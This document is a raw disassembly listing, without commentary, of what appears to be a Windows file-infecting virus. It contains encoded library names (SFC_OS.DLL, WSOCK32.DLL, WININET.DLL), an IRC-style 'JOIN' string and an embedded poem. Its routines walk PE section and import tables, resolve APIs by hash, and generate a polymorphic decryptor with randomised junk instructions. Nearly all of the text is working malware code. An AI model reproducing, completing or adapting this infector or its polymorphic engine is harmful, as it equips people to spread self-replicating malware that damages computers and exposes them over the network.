dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh
dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh
dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh
dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h
dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h
dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h
dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h
dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h
dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h
dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh
dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h
dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h
dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h
dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h
dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h
dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h
dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h
dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h
dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4E11AB71h
dd 10A61429h, 86E15194h, 0BD4000FEh, 18E50F70h, 0B300D183h
dd 0C91F7DBEh, 0C26CCC5Ch, 0CFB6CC77h, 0D8B8B352h, 16h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3142B474 proc near ; CODE XREF: sub_3142B52A:loc_3142B518�p
; sub_3142B57B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042E4h], 0
and dword ptr [ebp+1042E8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3142B490: ; CODE XREF: sub_3142B474+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3142B4B2
cmp eax, [edx+8]
jnb short loc_3142B4B2
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042E4h], edx
mov [ebp+1042E8h], eax
jmp short loc_3142B4B7
; ---------------------------------------------------------------------------
loc_3142B4B2: ; CODE XREF: sub_3142B474+23�j
; sub_3142B474+28�j
add edx, 28h
loop loc_3142B490
loc_3142B4B7: ; CODE XREF: sub_3142B474+3C�j
popa
retn 4
sub_3142B474 endp
; ---------------------------------------------------------------------------
mov [ebp+102457h], al
call sub_3142B52A
push 20h
lea eax, [ebp+102384h]
pop ecx
loc_3142B4D2: ; CODE XREF: .gda_:3142B4D9�j
cmp [eax], ebx
jz short loc_3142B4E2
add eax, 4
loop loc_3142B4D2
inc dword ptr [ebp+1042C0h]
retn
; ---------------------------------------------------------------------------
loc_3142B4E2: ; CODE XREF: .gda_:3142B4D4�j
neg ecx
add ecx, [ebp+102457h]
jecxz short loc_3142B4FC
loc_3142B4EC: ; CODE XREF: .gda_:3142B4F4�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3142B4EC
mov [ebp+102384h], ebx
; START OF FUNCTION CHUNK FOR sub_3142B52A
loc_3142B4FC: ; CODE XREF: .gda_:3142B4EA�j
; sub_3142B52A+34�j
cmp dword ptr [edx], 0
jz short loc_3142B506
sub esi, [edx]
add esi, [edx+10h]
loc_3142B506: ; CODE XREF: sub_3142B52A-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3142B515
push dword ptr [edx]
jmp short loc_3142B518
; ---------------------------------------------------------------------------
loc_3142B515: ; CODE XREF: sub_3142B52A-1B�j
push dword ptr [edx+10h]
loc_3142B518: ; CODE XREF: sub_3142B52A-17�j
call sub_3142B474
sub ecx, esi
sub ecx, [ebp+1042E8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_3142B52A
; =============== S U B R O U T I N E =======================================
sub_3142B52A proc near ; CODE XREF: .gda_:3142B4C1�p
; FUNCTION CHUNK AT 3142B4FC SIZE 0000002E BYTES
pop dword ptr [ebp+1042C4h]
mov dword ptr [ebp+1042C0h], 0
call sub_3142B57B
mov eax, [ebp+1042C0h]
call near ptr dword_3142ABB0+43h
call sub_3142B567
cmp dword ptr [ebp+1042C0h], 0
jnz short loc_3142B560
mov [ebp+102400h], ebx
jmp short loc_3142B4FC
; ---------------------------------------------------------------------------
loc_3142B560: ; CODE XREF: sub_3142B52A+2C�j
dec dword ptr [ebp+1042C0h]
retn
sub_3142B52A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142B567 proc near ; CODE XREF: sub_3142B52A+20�p
pop dword ptr [ebp+1042C4h]
mov [ebp+1042C0h], edx
call sub_3142B57B
xor ecx, ecx
retn
sub_3142B567 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142B57B proc near ; CODE XREF: sub_3142B52A+10�p
; sub_3142B567+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3142B474
add edx, [ebp+1042E8h]
add edx, esi
loc_3142B58F: ; CODE XREF: sub_3142B57B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3142B6A0
cmp dword ptr [edx+10h], 0
jz locret_3142B6A0
mov eax, [edx+0Ch]
push eax
call sub_3142B474
add eax, [ebp+1042E8h]
add eax, esi
push eax
loc_3142B5B5: ; CODE XREF: sub_3142B57B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3142B5D5
cmp cl, 2Eh
jz short loc_3142B5C4
loc_3142B5C1: ; CODE XREF: sub_3142B57B+58�j
inc eax
jmp short loc_3142B5B5
; ---------------------------------------------------------------------------
loc_3142B5C4: ; CODE XREF: sub_3142B57B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3142B5C1
loc_3142B5D5: ; CODE XREF: sub_3142B57B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3142B698
cmp word ptr [eax-2], 3233h
jnz loc_3142B698
push esi
cmp dword ptr [edx], 0
jnz short loc_3142B5F8
mov ecx, [edx+10h]
jmp short loc_3142B5FA
; ---------------------------------------------------------------------------
loc_3142B5F8: ; CODE XREF: sub_3142B57B+76�j
mov ecx, [edx]
loc_3142B5FA: ; CODE XREF: sub_3142B57B+7B�j
add esi, ecx
push ecx
call sub_3142B474
add esi, [ebp+1042E8h]
loc_3142B608: ; CODE XREF: sub_3142B57B+90�j
; sub_3142B57B+117�j
lodsd
test eax, eax
js short loc_3142B608
jz loc_3142B697
push dword ptr [ebp+1042E8h]
push eax
call sub_3142B474
add eax, [ebp+1042E8h]
pop dword ptr [ebp+1042E8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3142B634: ; CODE XREF: sub_3142B57B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3142B64B
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3142B634
; ---------------------------------------------------------------------------
loc_3142B64B: ; CODE XREF: sub_3142B57B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3142B691
cmp ebx, 0DB6E45A8h
jz short loc_3142B691
cmp ebx, 0FFA13B59h
jz short loc_3142B691
cmp ebx, 0ACB522D6h
jz short loc_3142B691
cmp ebx, 0F358E993h
jz short loc_3142B691
cmp ebx, 0F358E97Dh
jz short loc_3142B691
cmp ebx, 0E1253F46h
jz short loc_3142B691
cmp ebx, 0E1253F30h
jz short loc_3142B691
call dword ptr [ebp+1042C4h]
loc_3142B691: ; CODE XREF: sub_3142B57B+D6�j
; sub_3142B57B+DE�j ...
pop ebx
jmp loc_3142B608
; ---------------------------------------------------------------------------
loc_3142B697: ; CODE XREF: sub_3142B57B+92�j
pop esi
loc_3142B698: ; CODE XREF: sub_3142B57B+60�j
; sub_3142B57B+6C�j
add edx, 14h
jmp loc_3142B58F
; ---------------------------------------------------------------------------
locret_3142B6A0: ; CODE XREF: sub_3142B57B+18�j
; sub_3142B57B+22�j
retn
sub_3142B57B endp
; ---------------------------------------------------------------------------
db 3, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], ebp
jnz short loc_3142B736
or ax, 2589h
jmp short loc_3142B749
; ---------------------------------------------------------------------------
loc_3142B736: ; CODE XREF: .gda_:3142B72E�j
test byte ptr [ebp+1039AEh], 2
jnz short loc_3142B745
or ax, 2531h
jmp short loc_3142B749
; ---------------------------------------------------------------------------
loc_3142B745: ; CODE XREF: .gda_:3142B73D�j
or ax, 2501h
loc_3142B749: ; CODE XREF: .gda_:3142B734�j
; .gda_:3142B743�j
stosw
call near ptr dword_3142B6A4+68h
mov eax, [ebx+34h]
mov [ebp+1042D8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_3142B75B proc near ; CODE XREF: .gda_:3142BDA7�p
test dword ptr [ebp+1039B0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_3142B6A4+68h
mov [ebp+1042DCh], edx
test byte ptr [ebp+1039AEh], 1
jnz short loc_3142B783
rdtsc
jmp short loc_3142B785
; ---------------------------------------------------------------------------
loc_3142B783: ; CODE XREF: sub_3142B75B+22�j
sub eax, eax
loc_3142B785: ; CODE XREF: sub_3142B75B+26�j
stosd
retn
sub_3142B75B endp
; =============== S U B R O U T I N E =======================================
sub_3142B787 proc near ; CODE XREF: .gda_:loc_3142BDB1�p
test dword ptr [ebp+1039B0h], 10000000h
jz short loc_3142B7BA
mov al, [ebp+1039AAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039AAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3142B7CC
; ---------------------------------------------------------------------------
loc_3142B7BA: ; CODE XREF: sub_3142B787+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039AAh]
add al, 58h
shl eax, 18h
stosd
locret_3142B7CC: ; CODE XREF: sub_3142B787+31�j
retn
sub_3142B787 endp
; =============== S U B R O U T I N E =======================================
sub_3142B7CD proc near ; CODE XREF: sub_3142B83F:loc_3142B866�p
; sub_3142B83F+4C�p ...
mov byte ptr [ebp+10278Ch], 9
jmp short loc_3142B7FB
; ---------------------------------------------------------------------------
loc_3142B7D6: ; CODE XREF: sub_3142B7CD+44�j
mov al, 0FCh
jmp short loc_3142B7FA
; ---------------------------------------------------------------------------
loc_3142B7DA: ; CODE XREF: sub_3142B7CD+48�j
mov ax, 0EBh
stosw
jmp short loc_3142B7FB
; ---------------------------------------------------------------------------
loc_3142B7E2: ; CODE XREF: sub_3142B7CD+4C�j
push 4
pop eax
call near ptr dword_3142ABB0+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3142B7FB
; ---------------------------------------------------------------------------
loc_3142B7F8: ; CODE XREF: sub_3142B7CD+50�j
mov al, 90h
loc_3142B7FA: ; CODE XREF: sub_3142B7CD+B�j
; sub_3142B7CD+60�j ...
stosb
loc_3142B7FB: ; CODE XREF: sub_3142B7CD+7�j
; sub_3142B7CD+13�j ...
push 1Bh
pop eax
call near ptr dword_3142ABB0+43h
add byte ptr [ebp+10278Ch], 6
cmp dl, 8
jnb short locret_3142B83E
test dl, dl
jz short loc_3142B7D6
dec dl
jz short loc_3142B7DA
dec dl
jz short loc_3142B7E2
dec dl
jz short loc_3142B7F8
dec dl
jz short loc_3142B82F
dec dl
jz short loc_3142B836
dec dl
jz short loc_3142B83A
mov al, 0F9h
jmp short loc_3142B7FA
; ---------------------------------------------------------------------------
loc_3142B82F: ; CODE XREF: sub_3142B7CD+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3142B7FA
; ---------------------------------------------------------------------------
loc_3142B836: ; CODE XREF: sub_3142B7CD+58�j
mov al, 0F5h
jmp short loc_3142B7FA
; ---------------------------------------------------------------------------
loc_3142B83A: ; CODE XREF: sub_3142B7CD+5C�j
mov al, 0F8h
jmp short loc_3142B7FA
; ---------------------------------------------------------------------------
locret_3142B83E: ; CODE XREF: sub_3142B7CD+40�j
retn
sub_3142B7CD endp
; =============== S U B R O U T I N E =======================================
sub_3142B83F proc near ; CODE XREF: .gda_:loc_3142BC88�p
; .gda_:3142BE3B�p
test dword ptr [ebp+1039B0h], 2000h
mov al, 86h
jnz short loc_3142B84F
add al, 4
loc_3142B84F: ; CODE XREF: sub_3142B83F+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039A8h]
stosw
cmp ah, 5
jnz short loc_3142B866
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3142B866: ; CODE XREF: sub_3142B83F+1E�j
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 4000h
mov ax, 3166h
jnz short loc_3142B87D
mov ah, 29h
loc_3142B87D: ; CODE XREF: sub_3142B83F+3A�j
stosw
mov al, 18h
or al, [ebp+1039AAh]
shl al, 3
stosb
call sub_3142B7CD
mov al, 88h
test dword ptr [ebp+1039B0h], 8000h
jnz short loc_3142B8A0
mov al, 86h
loc_3142B8A0: ; CODE XREF: sub_3142B83F+5D�j
mov ah, [ebp+1039A8h]
stosw
cmp ah, 5
jnz short locret_3142B8B4
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_3142B8B4: ; CODE XREF: sub_3142B83F+6C�j
retn
sub_3142B83F endp
; ---------------------------------------------------------------------------
loc_3142B8B5: ; CODE XREF: sub_3142C4BB+183�p
lea edi, [ebp+1039BCh]
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 400000h
jz short near ptr unk_3142B8CF
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3142B8CF db 0F7h ; ÷ ; CODE XREF: .gda_:3142B8CA�j
db 85h ; …
db 0B0h ; °
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-4F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h
dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh
dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h
dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h
dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h
dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h
dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0
dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h
dd 0F7AB0010h, 1039B085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_3142BB60
mov al, 50h
add al, [ebp+1039A8h]
stosb
loc_3142BB60: ; CODE XREF: .gda_:3142BB55�j
test dword ptr [ebp+1039B0h], 80h
jnz short loc_3142BB77
mov al, 0B8h
or al, [ebp+1039A9h]
stosb
jmp short loc_3142BBB4
; ---------------------------------------------------------------------------
loc_3142BB77: ; CODE XREF: .gda_:3142BB6A�j
mov ax, 1831h
test dword ptr [ebp+1039B0h], 100h
jz short loc_3142BB89
mov al, 29h
loc_3142BB89: ; CODE XREF: .gda_:3142BB85�j
or ah, [ebp+1039A9h]
shl ah, 3
or ah, [ebp+1039A9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039B0h], 200h
jnz short loc_3142BBAC
mov ah, 0C8h
loc_3142BBAC: ; CODE XREF: .gda_:3142BBA8�j
or ah, [ebp+1039A9h]
stosw
loc_3142BBB4: ; CODE XREF: .gda_:3142BB75�j
mov [ebp+1042D4h], edi
mov eax, 29BCh
stosd
test dword ptr [ebp+1039B0h], 8
jz short loc_3142BC3D
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 400h
jnz short loc_3142BBE8
mov al, 0B8h
or al, [ebp+1039AAh]
stosb
jmp short loc_3142BC35
; ---------------------------------------------------------------------------
loc_3142BBE8: ; CODE XREF: .gda_:3142BBDB�j
test dword ptr [ebp+1039B0h], 800h
jnz short loc_3142BC05
mov ax, 0E083h
or ah, [ebp+1039AAh]
stosw
xor eax, eax
stosb
jmp short loc_3142BC1A
; ---------------------------------------------------------------------------
loc_3142BC05: ; CODE XREF: .gda_:3142BBF2�j
mov ax, 1829h
or ah, [ebp+1039AAh]
shl ah, 3
or ah, [ebp+1039AAh]
stosw
loc_3142BC1A: ; CODE XREF: .gda_:3142BC03�j
test dword ptr [ebp+1039B0h], 1000h
mov ax, 0C081h
jz short loc_3142BC2D
add ah, 8
loc_3142BC2D: ; CODE XREF: .gda_:3142BC28�j
or ah, [ebp+1039AAh]
stosw
loc_3142BC35: ; CODE XREF: .gda_:3142BBE6�j
movzx eax, byte ptr [ebp+1039AEh]
stosd
loc_3142BC3D: ; CODE XREF: .gda_:3142BBCA�j
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 40000000h
jz short loc_3142BC5C
mov al, 50h
add al, [ebp+1039A8h]
stosb
call sub_3142B7CD
loc_3142BC5C: ; CODE XREF: .gda_:3142BC4C�j
lea ecx, [edi-2]
mov [ebp+1042BCh], ecx
test dword ptr [ebp+1039B0h], 80000000h
jz short loc_3142BC88
mov al, 0E8h
stosb
mov eax, [ebp+1042E0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042E0h], edi
jmp short loc_3142BC8D
; ---------------------------------------------------------------------------
loc_3142BC88: ; CODE XREF: .gda_:3142BC6F�j
call sub_3142B83F
loc_3142BC8D: ; CODE XREF: .gda_:3142BC86�j
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 10000h
jnz short loc_3142BCA9
mov al, 40h
or al, [ebp+1039A8h]
stosb
jmp short loc_3142BCB8
; ---------------------------------------------------------------------------
loc_3142BCA9: ; CODE XREF: .gda_:3142BC9C�j
mov ax, 0C083h
or ah, [ebp+1039A8h]
stosw
mov al, 1
stosb
loc_3142BCB8: ; CODE XREF: .gda_:3142BCA7�j
test dword ptr [ebp+1039B0h], 20000h
jnz short loc_3142BCF3
test dword ptr [ebp+1039B0h], 40000h
jnz short loc_3142BCEA
mov al, 0C0h
or al, [ebp+1039AAh]
mov ah, [ebp+1039AFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3142BCF2
; ---------------------------------------------------------------------------
loc_3142BCEA: ; CODE XREF: .gda_:3142BCCE�j
mov al, 40h
or al, [ebp+1039AAh]
loc_3142BCF2: ; CODE XREF: .gda_:3142BCE8�j
stosb
loc_3142BCF3: ; CODE XREF: .gda_:3142BCC2�j
test dword ptr [ebp+1039B0h], 80000h
jnz short loc_3142BD0F
mov ax, 0E883h
or ah, [ebp+1039A9h]
stosw
mov al, 1
jmp short loc_3142BD17
; ---------------------------------------------------------------------------
loc_3142BD0F: ; CODE XREF: .gda_:3142BCFD�j
mov al, 48h
or al, [ebp+1039A9h]
loc_3142BD17: ; CODE XREF: .gda_:3142BD0D�j
stosb
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 100000h
mov cl, 75h
jnz short loc_3142BD50
mov ax, 0F883h
or ah, [ebp+1039A9h]
stosw
xor eax, eax
stosb
sub [ebp+1042BCh], edi
test dword ptr [ebp+1039B0h], 200000h
jnz short loc_3142BD6B
mov cl, 77h
jmp short loc_3142BD6B
; ---------------------------------------------------------------------------
loc_3142BD50: ; CODE XREF: .gda_:3142BD29�j
mov ax, 1809h
or ah, [ebp+1039A9h]
shl ah, 3
or ah, [ebp+1039A9h]
stosw
sub [ebp+1042BCh], edi
loc_3142BD6B: ; CODE XREF: .gda_:3142BD4A�j
; .gda_:3142BD4E�j
mov al, cl
mov ah, [ebp+1042BCh]
stosw
mov al, 58h
add al, [ebp+1039A8h]
stosb
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 2000003h
jz short loc_3142BDBB
test dword ptr [ebp+1039B0h], 8000000h
jnz short loc_3142BDBB
test dword ptr [ebp+1039B0h], 6000000h
jnz short loc_3142BDB1
call sub_3142B75B
call sub_3142B7CD
loc_3142BDB1: ; CODE XREF: .gda_:3142BDA5�j
call sub_3142B787
call sub_3142B7CD
loc_3142BDBB: ; CODE XREF: .gda_:3142BD8D�j
; .gda_:3142BD99�j
test dword ptr [ebp+1039B0h], 10000000h
jz short loc_3142BDCF
mov al, 0C9h
stosb
call sub_3142B7CD
loc_3142BDCF: ; CODE XREF: .gda_:3142BDC5�j
test dword ptr [ebp+1039B0h], 400000h
jz short loc_3142BE05
mov al, 7
sub al, [ebp+1039A8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039A8h]
shl ah, 3
add ah, 4
stosd
call sub_3142B7CD
mov al, 61h
stosb
call sub_3142B7CD
loc_3142BE05: ; CODE XREF: .gda_:3142BDD9�j
mov ax, 0E0FFh
or ah, [ebp+1039A8h]
stosw
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 20h
jz short loc_3142BE91
test dword ptr [ebp+1039B0h], 80000000h
jz short loc_3142BE4D
mov eax, edi
mov ecx, [ebp+1042E0h]
sub eax, ecx
mov [ecx-4], eax
call sub_3142B83F
call sub_3142B7CD
mov al, 0C3h
stosb
call sub_3142B7CD
loc_3142BE4D: ; CODE XREF: .gda_:3142BE2C�j
mov eax, edi
mov ecx, [ebp+1042B4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039A8h]
stosb
call sub_3142B7CD
test dword ptr [ebp+1039B0h], 800000h
jz short loc_3142BE80
mov ax, 0C350h
or al, [ebp+1039A8h]
jmp short loc_3142BE8A
; ---------------------------------------------------------------------------
loc_3142BE80: ; CODE XREF: .gda_:3142BE72�j
mov ax, 0E0FFh
or ah, [ebp+1039A8h]
loc_3142BE8A: ; CODE XREF: .gda_:3142BE7E�j
stosw
call sub_3142B7CD
loc_3142BE91: ; CODE XREF: .gda_:3142BE20�j
test dword ptr [ebp+1039B0h], 2000003h
jz short loc_3142BEFC
mov ecx, edi
mov eax, [ebp+1042CCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039B0h], 1000000h
jnz short loc_3142BEC6
lea eax, [ebp+1039A8h]
loc_3142BEBE: ; CODE XREF: .gda_:3142BEC4�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3142BEBE
loc_3142BEC6: ; CODE XREF: .gda_:3142BEB6�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3142BEDB
mov ax, 0C031h
stosw
loc_3142BEDB: ; CODE XREF: .gda_:3142BED3�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3142BEF4
mov ax, 0C031h
stosw
loc_3142BEF4: ; CODE XREF: .gda_:3142BEEC�j
mov al, 0C3h
stosb
call sub_3142B7CD
loc_3142BEFC: ; CODE XREF: .gda_:3142BE9B�j
lea eax, [ebp+1039BCh]
test dword ptr [ebp+1039B0h], 20000000h
jnz short loc_3142BF14
push edi
sub edi, eax
pop eax
jmp short loc_3142BF2D
; ---------------------------------------------------------------------------
loc_3142BF14: ; CODE XREF: .gda_:3142BF0C�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042D4h]
add [ebp+1042B4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3142BF2D: ; CODE XREF: .gda_:3142BF12�j
mov [ebp+101069h], edi
mov edi, [ebp+1042B8h]
sub eax, [ebp+1042B4h]
